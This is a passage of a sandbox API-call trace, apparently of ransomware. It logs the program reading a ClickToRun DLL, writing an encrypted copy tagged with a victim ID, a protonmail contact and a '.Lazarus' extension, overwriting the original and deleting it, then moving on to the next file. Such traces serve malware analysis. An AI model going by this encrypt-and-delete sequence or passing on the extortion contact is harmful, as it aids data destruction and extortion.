(HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0090.868] GetLastError () returned 0x0 [0090.868] SetLastError (dwErrCode=0x0) [0090.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4de00 [0090.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x4f220 [0090.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b568 [0090.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d630 [0090.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0090.868] GetLastError () returned 0x0 [0090.868] SetLastError (dwErrCode=0x0) [0090.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0090.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0090.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8f) returned 0x8a368 [0090.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0090.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x4ebc8 [0090.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0090.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0090.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0090.868] AreFileApisANSI () returned 1 [0090.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0090.868] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x132) returned 0x4e568 [0090.868] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4ebc8, cbMultiByte=-1, lpWideCharStr=0x4e568, cchWideChar=153 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 153 [0090.868] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0090.869] GetFileType (hFile=0x33c) returned 0x1 [0090.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e568 | out: hHeap=0x20000) returned 1 [0090.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0090.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0090.869] AreFileApisANSI () returned 1 [0090.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0090.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x55f20 [0090.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=91 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll") returned 91 [0090.869] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0090.869] GetFileType (hFile=0x360) returned 0x1 [0090.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0090.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0090.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0090.870] GetLastError () returned 0x0 [0090.870] SetLastError (dwErrCode=0x0) [0090.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0090.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0090.870] GetLastError () returned 0x0 [0090.870] SetLastError (dwErrCode=0x0) [0090.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0090.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0090.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0090.870] ReadFile (in: hFile=0x360, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0090.911] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0090.911] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6a8 [0090.912] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x49ca0 [0090.912] GetLastError () returned 0x0 [0090.912] SetLastError (dwErrCode=0x0) [0090.912] GetLastError () returned 0x0 [0090.912] SetLastError (dwErrCode=0x0) [0090.912] GetLastError () returned 0x0 [0090.912] SetLastError (dwErrCode=0x0) [0090.912] GetLastError () returned 0x0 [0090.912] SetLastError (dwErrCode=0x0) [0090.912] ReadFile (in: hFile=0x360, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.915] WriteFile (in: hFile=0x33c, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.917] GetLastError () returned 0x0 [0090.917] SetLastError (dwErrCode=0x0) [0090.917] GetLastError () returned 0x0 [0090.917] SetLastError (dwErrCode=0x0) [0090.917] GetLastError () returned 0x0 [0090.917] SetLastError (dwErrCode=0x0) [0090.917] GetLastError () returned 0x0 [0090.917] SetLastError (dwErrCode=0x0) [0090.917] ReadFile (in: hFile=0x360, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.917] WriteFile (in: hFile=0x33c, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.918] GetLastError () returned 0x0 [0090.918] SetLastError (dwErrCode=0x0) [0090.918] GetLastError () returned 0x0 [0090.918] SetLastError (dwErrCode=0x0) [0090.918] GetLastError () returned 0x0 [0090.918] SetLastError (dwErrCode=0x0) [0090.918] GetLastError () returned 0x0 [0090.918] SetLastError (dwErrCode=0x0) [0090.918] ReadFile (in: hFile=0x360, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.918] WriteFile (in: hFile=0x33c, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.919] GetLastError () returned 0x0 [0090.919] SetLastError (dwErrCode=0x0) [0090.919] GetLastError () returned 0x0 [0090.919] SetLastError (dwErrCode=0x0) [0090.919] GetLastError () returned 0x0 [0090.919] SetLastError (dwErrCode=0x0) [0090.919] GetLastError () returned 0x0 [0090.919] SetLastError (dwErrCode=0x0) [0090.919] ReadFile (in: hFile=0x360, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.919] WriteFile (in: hFile=0x33c, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.919] GetLastError () returned 0x0 [0090.919] SetLastError (dwErrCode=0x0) [0090.919] GetLastError () returned 0x0 [0090.920] SetLastError (dwErrCode=0x0) [0090.920] GetLastError () returned 0x0 [0090.920] SetLastError (dwErrCode=0x0) [0090.920] GetLastError () returned 0x0 [0090.920] SetLastError (dwErrCode=0x0) [0090.920] ReadFile (in: hFile=0x360, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.920] WriteFile (in: hFile=0x33c, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.920] GetLastError () returned 0x0 [0090.920] SetLastError (dwErrCode=0x0) [0090.920] GetLastError () returned 0x0 [0090.920] SetLastError (dwErrCode=0x0) [0090.921] GetLastError () returned 0x0 [0090.921] SetLastError (dwErrCode=0x0) [0090.921] GetLastError () returned 0x0 [0090.921] SetLastError (dwErrCode=0x0) [0090.921] ReadFile (in: hFile=0x360, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0xc0, lpOverlapped=0x0) returned 1 [0090.921] ReadFile (in: hFile=0x360, lpBuffer=0x90450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x90450*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0090.921] WriteFile (in: hFile=0x33c, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0090.921] GetLastError () returned 0x0 [0090.921] SetLastError (dwErrCode=0x0) [0090.921] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0090.921] WriteFile (in: hFile=0x33c, lpBuffer=0x49ca0*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x49ca0*, lpNumberOfBytesWritten=0x327ef70*=0xc0, lpOverlapped=0x0) returned 1 [0090.922] GetLastError () returned 0x0 [0090.922] SetLastError (dwErrCode=0x0) [0090.922] GetLastError () returned 0x0 [0090.922] SetLastError (dwErrCode=0x0) [0090.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0090.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0090.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0090.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0090.922] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0090.922] CloseHandle (hObject=0x33c) returned 1 [0090.924] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x90450 | out: hHeap=0x20000) returned 1 [0090.924] CloseHandle (hObject=0x360) returned 1 [0090.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0090.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0090.924] AreFileApisANSI () returned 1 [0090.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0090.924] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x55f20 [0090.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=91 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll") returned 91 [0090.924] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0090.926] GetFileType (hFile=0x360) returned 0x1 [0090.926] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.926] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x90450 [0090.926] GetLastError () returned 0xb7 [0090.926] SetLastError (dwErrCode=0xb7) [0090.926] WriteFile (in: hFile=0x360, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0090.927] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x90450 | out: hHeap=0x20000) returned 1 [0090.927] CloseHandle (hObject=0x360) returned 1 [0090.928] AreFileApisANSI () returned 1 [0090.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0090.928] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb6) returned 0x55f20 [0090.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=91 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll") returned 91 [0090.928] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-string-l1-1-0.dll")) returned 1 [0090.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0090.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0090.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0090.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0090.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0090.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0090.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0090.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0090.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0090.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b568 | out: hHeap=0x20000) returned 1 [0090.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0090.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0090.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0090.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0090.929] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71828 | out: hHeap=0x20000) returned 1 [0090.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.929] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.930] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x52c0, dwReserved0=0x1, dwReserved1=0x202f4, cFileName="api-ms-win-crt-time-l1-1-0.dll", cAlternateFileName="AP5E4C~1.DLL")) returned 1 [0090.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0090.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0090.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0090.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0090.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0090.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0090.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0090.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0090.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0090.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0090.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0090.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0090.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0090.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0090.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0090.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0090.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0090.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0090.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0090.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0090.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0090.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0090.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x4ebc8 [0090.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0090.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0090.930] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x55f20 [0090.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0090.930] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.930] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.930] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.930] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.930] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0090.931] AreFileApisANSI () returned 1 [0090.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 89 [0090.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0090.931] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.931] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0090.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0090.931] AreFileApisANSI () returned 1 [0090.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0090.931] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x55f20 [0090.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll") returned 89 [0090.931] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0090.931] GetFileType (hFile=0x360) returned 0x1 [0090.931] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.931] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0090.932] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0090.932] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0090.932] CloseHandle (hObject=0x360) returned 1 [0090.932] AreFileApisANSI () returned 1 [0090.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 89 [0090.932] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb2) returned 0x55f20 [0090.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=89 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll") returned 89 [0090.932] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-time-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0090.932] GetFileType (hFile=0x360) returned 0x1 [0090.932] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0090.933] CloseHandle (hObject=0x360) returned 1 [0090.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.933] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0090.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.933] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.933] HeapFree (in: hHeap=0x20000, 